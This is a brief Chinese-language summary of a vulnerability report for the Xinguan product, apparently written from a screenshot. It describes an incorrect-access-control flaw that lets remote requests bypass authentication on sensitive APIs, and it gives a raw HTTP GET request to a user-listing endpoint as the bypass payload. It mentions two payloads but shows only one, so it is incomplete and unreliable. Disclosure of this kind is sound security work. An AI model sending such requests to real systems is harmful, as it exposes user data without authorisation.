从这个网页截图中可以获取到以下关于漏洞的关键信息: 漏洞类型: 错误的访问控制 (Incorrect Access Control) 受影响的产品: Xinguan 受影响的版本: 所有版本(<= 0.0.1-SNAPSHOT) 受影响的组件: 需要身份验证的敏感API 攻击类型: 远程 漏洞详情: - 直接发送以下payload到API 会因为身份验证而失败。 - 但是,发送以下payload到API 可以绕过身份验证。 http GET /system/user/findUserList HTTP/1.1 User-Agent: Apifox/1.0.0 (https://apifox.com) Accept: / Host: 127.0.0.1:8089 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=88EBD536FD0D32C29390369216B192C3